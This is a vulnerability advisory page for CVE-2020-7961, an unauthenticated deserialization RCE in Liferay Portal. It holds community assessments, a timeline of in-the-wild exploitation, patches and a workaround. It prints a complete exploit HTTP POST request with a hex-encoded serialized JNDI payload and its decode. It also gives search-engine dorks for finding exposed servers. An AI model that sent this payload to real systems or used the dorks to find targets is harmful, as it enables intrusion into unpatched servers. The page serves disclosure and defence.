Very High
CVE-2020-7961
CVE-2020-7961
Description
Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
Add Assessment
Technical Analysis
A Metasploit module has been written: https://github.com/rapid7/metasploit-framework/pull/13213.
ETA: Please see the Rapid7 analysis. CVE-2020-7961 is being used in the “FreakOut” attack campaign.
Technical Analysis
Google dork:- inurl:/api/jsonws
Shodan:- Powered+By+Liferay
publicwww:-https://publicwww.com/websites/Powered+By+Liferay/
Technical Analysis
quick assessment to add references:
good write up the vulnerability https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
working PoC https://github.com/mzer0one/CVE-2020-7961-POC
there is not so much to add here because synacktiv already explained what’s interesting: a preauth RCE on a commonly used in enterprise and internet faced framework. a framework NOT updated on regularly basis.
plus, based on my very own experience, liferay/tomcat on windows let you mostly land as SYSTEM. with an install base, according to shodan, of more than the half on windows, this is a very interesting vuln to exploit
Technical Analysis
This has now been reported as being exploited in the wild as part of the FreakOut attacks as first reported by CheckPoint Research at https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/.
CVSS V3 Severity and Metrics
General Information
Metasploit Modules
Exploited in the Wild
References
Advisory
Exploit
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
Miscellaneous
Technical Analysis
Description
Update January 19, 2021: Check Point Research released a blog post warning that the “FreakOut” attack campaign is utilizing CVE-2020-7961, as well as CVE-2020-28188 and CVE-2021-3007, to infect hosts with IRC botnet malware. Rapid7 urges customers to incorporate incident response into their remediation of CVE-2020-7961.
On November 25, 2019, Liferay released a security advisory for CVE-2020-7961, a Java deserialization vulnerability in Liferay Portal’s JSON Web Services (JSONWS). Exploitation of the vulnerability leads to unauthenticated remote code execution (RCE) in Liferay Portal versions 7.2.0 and earlier. Markus Wulftange of Code White is credited with the discovery of CVE-2020-7961.
On March 20, 2020, Code White released a technical writeup on the Liferay Portal vulnerabilities they discovered, notably detailing their discovery of CVE-2020-7961. Code White did not release a proof-of-concept (PoC) for CVE-2020-7961 but did prove they had achieved RCE with it.
On March 30, 2020, Thomas Etrillard of Synactiv released an analysis of CVE-2020-7961 based on Code White’s research. Etrillard further documented the PoC commands necessary to exploit the vulnerability. A Metasploit module exists for CVE-2020-7961.
Affected products
Liferay Portal 7.2.0 and earlier.
Rapid7 analysis
CVE-2020-7961 is exploitable by sending a single HTTP POST request to the /api/jsonws/expandocolumn/update-column endpoint, as seen in the following example Metasploit request.
POST /api/jsonws/expandocolumn/update-column HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 1338 columnId=12&name=12&type=37&%2bdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource&defaultData.userOverridesAsString=HexAsciiSerializedMap%3aaced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400174a767469616c7462616d6e6676626264726c7a70667869740016687474703a2f2f3132372e302e302e313a383038322f7400174a767469616c7462616d6e6676626264726c7a70667869%3b
The Java deserialization attack can be seen in the request’s defaultData.userOverridesAsString parameter.
wvu@kharak:~$ xxd -r -p <<<aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400174a767469616c7462616d6e6676626264726c7a70667869740016687474703a2f2f3132372e302e302e313a383038322f7400174a767469616c7462616d6e6676626264726c7a70667869 | tee >(file -) >(xxd) > /dev/null 00000000: aced 0005 7372 003d 636f 6d2e 6d63 6861 ....sr.=com.mcha 00000010: 6e67 652e 7632 2e6e 616d 696e 672e 5265 nge.v2.naming.Re 00000020: 6665 7265 6e63 6549 6e64 6972 6563 746f ferenceIndirecto 00000030: 7224 5265 6665 7265 6e63 6553 6572 6961 r$ReferenceSeria 00000040: 6c69 7a65 6462 1985 d0d1 2ac2 1302 0004 lizedb....*..... 00000050: 4c00 0b63 6f6e 7465 7874 4e61 6d65 7400 L..contextNamet. 00000060: 134c 6a61 7661 782f 6e61 6d69 6e67 2f4e .Ljavax/naming/N 00000070: 616d 653b 4c00 0365 6e76 7400 154c 6a61 ame;L..envt..Lja 00000080: 7661 2f75 7469 6c2f 4861 7368 7461 626c va/util/Hashtabl 00000090: 653b 4c00 046e 616d 6571 007e 0001 4c00 e;L..nameq.~..L. 000000a0: 0972 6566 6572 656e 6365 7400 184c 6a61 .referencet..Lja 000000b0: 7661 782f 6e61 6d69 6e67 2f52 6566 6572 vax/naming/Refer 000000c0: 656e 6365 3b78 7070 7070 7372 0016 6a61 ence;xppppsr..ja 000000d0: 7661 782e 6e61 6d69 6e67 2e52 6566 6572 vax.naming.Refer 000000e0: 656e 6365 e8c6 9ea2 a8e9 8d09 0200 044c ence...........L 000000f0: 0005 6164 6472 7374 0012 4c6a 6176 612f ..addrst..Ljava/ 00000100: 7574 696c 2f56 6563 746f 723b 4c00 0c63 util/Vector;L..c 00000110: 6c61 7373 4661 6374 6f72 7974 0012 4c6a lassFactoryt..Lj 00000120: 6176 612f 6c61 6e67 2f53 7472 696e 673b ava/lang/String; 00000130: 4c00 1463 6c61 7373 4661 6374 6f72 794c L..classFactoryL 00000140: 6f63 6174 696f 6e71 007e 0007 4c00 0963 ocationq.~..L..c 00000150: 6c61 7373 4e61 6d65 7100 7e00 0778 7073 lassNameq.~..xps 00000160: 7200 106a 6176 612e 7574 696c 2e56 6563 r..java.util.Vec 00000170: 746f 72d9 977d 5b80 3baf 0103 0003 4900 tor..}[.;.....I. 00000180: 1163 6170 6163 6974 7949 6e63 7265 6d65 .capacityIncreme 00000190: 6e74 4900 0c65 6c65 6d65 6e74 436f 756e ntI..elementCoun 000001a0: 745b 000b 656c 656d 656e 7444 6174 6174 t[..elementDatat 000001b0: 0013 5b4c 6a61 7661 2f6c 616e 672f 4f62 ..[Ljava/lang/Ob 000001c0: 6a65 6374 3b78 7000 0000 0000 0000 0075 ject;xp........u 000001d0: 7200 135b 4c6a 6176 612e 6c61 6e67 2e4f r..[Ljava.lang.O 000001e0: 626a 6563 743b 90ce 589f 1073 296c 0200 bject;..X..s)l.. 000001f0: 0078 7000 0000 0a70 7070 7070 7070 7070 .xp....ppppppppp 00000200: 7078 7400 174a 7674 6961 6c74 6261 6d6e pxt..Jvtialtbamn 00000210: 6676 6262 6472 6c7a 7066 7869 7400 1668 fvbbdrlzpfxit..h 00000220: 7474 703a 2f2f 3132 372e 302e 302e 313a ttp://127.0.0.1: 00000230: 3830 3832 2f74 0017 4a76 7469 616c 7462 8082/t..Jvtialtb 00000240: 616d 6e66 7662 6264 726c 7a70 6678 69 amnfvbbdrlzpfxi /dev/stdin: Java serialization data, version 5 wvu@kharak:~$
Guidance
Rapid7 recommends that Liferay Portal customers apply the appropriate patch or workaround in this document. The patch and workaround information is reproduced below.
Patches
Liferay Portal 7.2: There is no patch available for Liferay Portal 7.2.0. Instead, users should upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later.
Liferay Portal 7.1: Source patch for Liferay Portal 7.1 GA4 (7.1.3) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.
Liferay Portal 7.0: Source patch for Liferay Portal 7.0 GA7 (7.0.6) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.
Liferay Portal 6.2: Source patch for Liferay Portal 6.2 GA6 (6.2.5) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.
Workaround
Disable JSONWS by setting the portal.property jsonws.servlet.hosts.allowed=Not/Available.
References
- https://portal.liferay.dev/learn/security/known-vulnerabilities/–/asset_publisher/HbL5mxmVrnXW/content/id/117954271
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
- https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/liferay_java_unmarshalling.rb
